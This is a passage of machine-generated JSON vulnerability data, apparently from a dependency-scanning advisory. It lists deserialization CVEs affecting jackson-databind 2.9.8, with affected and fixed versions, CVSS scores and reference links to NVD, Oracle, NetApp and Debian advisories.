cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10672/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36179"]}],"cve":"CVE-2020-36179","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-36179"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36179/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36183"]}],"cve":"CVE-2020-36183","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:34","ids":[{"system_name":"CVE Record","text":"CVE-2020-36183"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"]}],"title":"CVE-2020-36183/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11113"]}],"cve":"CVE-2020-11113","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-11113"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11113/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14062"]}],"cve":"CVE-2020-14062","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-14062"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14062/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14061"]}],"cve":"CVE-2020-14061","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-14061"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14061/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36181"]}],"cve":"CVE-2020-36181","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-36181"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36181/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36188"]}],"cve":"CVE-2020-36188","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:42","ids":[{"system_name":"CVE Record","text":"CVE-2020-36188"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36188/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10673"]}],"cve":"CVE-2020-10673","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:04","ids":[{"system_name":"CVE Record","text":"CVE-2020-10673"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"]}],"title":"CVE-2020-10673/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24616"]}],"cve":"CVE-2020-24616","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:14:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-24616"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Code Injection in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Code Injection in jackson-databind This project contains the 